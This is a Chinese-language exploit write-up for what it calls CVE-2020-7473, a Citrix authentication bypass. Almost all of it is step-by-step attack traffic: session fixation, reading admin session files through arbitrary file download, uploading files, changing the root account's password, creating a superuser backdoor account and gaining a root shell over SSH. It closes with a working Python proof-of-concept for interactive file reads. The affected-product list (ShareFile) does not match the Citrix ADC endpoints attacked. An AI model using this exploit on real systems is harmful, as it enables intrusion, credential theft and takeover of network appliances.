(CVE-2020-7473)Citrix 认证绕过getshell¶
一、漏洞简介¶
二、漏洞影响¶
ShareFile storage zones Controller 5.9.0
ShareFile storage zones Controller 5.8.0
ShareFile storage zones Controller 5.7.0
ShareFile StorageZones Controller 5.6.0
ShareFile StorageZones Controller 5.5.0
及ShareFile StorageZones Controller更早版本
三、复现过程¶
0x01 CreateSession¶
request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
0x02 fix session¶
request
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400
response
HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
0x03 Get rand_key¶
request
GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
response
HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;
</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>
note: var rand = \"181103693.1594540472072128\";
0x04 re-break Session¶
request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
0x05 Read Dir¶
request
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....
0x06 Read Session¶
resquest
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";
0x07 UploadFile Getshell¶
You Can Upload to /root/.ssh/authorized_key Note: Get rand_key &
SESSID from file:sess_[32charactor]
request
POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8
{"errorcode":"0","message":"Done"}
0x08 ChangePassword && SSH¶
request
PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot@www.0-sec.org
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost
0x09 CreateUser && SSH¶
request:CreateUser
POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}
response:CreateUser
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}
response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot1@www.0-sec.org
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost#
poc¶
3.png
#!/usr/bin/env python
import requests
import sys
import string
import random
import json
from urllib.parse import quote
requests.packages.urllib3.disable_warnings()
def random_string(length=8):
chars = string.ascii_letters + string.digits
random_string = ''.join(random.choice(chars) for x in range(length))
return random_string
def create_session(base_url, session):
url = '{0}/pcidss/report'.format(base_url)
params = {
'type':'allprofiles',
'sid':'loginchallengeresponse1requestbody',
'username':'nsroot',
'set':'1'
}
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
}
data = '<appfwprofile><login></login></appfwprofile>'
proxies = {"http":"http://127.0.0.1:8080/"}
session.post(url=url, params=params, headers=headers, data=data, verify=False,proxies=proxies)
return session
def fix_session(base_url, session):
url = '{0}/menu/ss'.format(base_url)
params = {
'sid':'nsroot',
'username':'nsroot',
'force_setup':'1'
}
proxies = {"http":"http://127.0.0.1:8080/"}
session.get(url=url, params=params, verify=False,proxies=proxies)
def get_rand(base_url, session):
url = '{0}/menu/stc'.format(base_url)
proxies = {"http":"http://127.0.0.1:8080/"}
r = session.get(url=url, verify=False,proxies=proxies)
for line in r.text.split('\n'):
if 'var rand =' in line:
rand = line.split('"')[1]
return rand
def do_lfi(base_url, session, rand):
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
'rand_key':rand
}
data = '<clipermission></clipermission>'
proxies = {"http":"http://127.0.0.1:8080/"}
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("[+] Send Success!")
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
while 1:
PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
# pass
else:
print ("[+] Error!")
def main(base_url):
print ('[-] Creating session..')
session = requests.Session()
create_session(base_url, session)
print ('[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
print('[-] Fixing session..')
fix_session(base_url, session)
print ('[-] Getting rand..')
rand = get_rand(base_url, session)
print ('[+] Got rand: {0}'.format(rand))
print ('[-] Re-breaking session..')
create_session(base_url, session)
print ('[-] Getting file..')
do_lfi(base_url, session, rand)
if __name__ == '__main__':
# Slashes need to be urlencoded
base_url = sys.argv[1]
if base_url[-1] == '/':
base_url = base_url[:-1]
else:
base_url = base_url
# PAYLOAD='%2fetc%2fpasswd'
PAYLOAD = quote(input("[+] Set File= "),"utf-8")
main(base_url)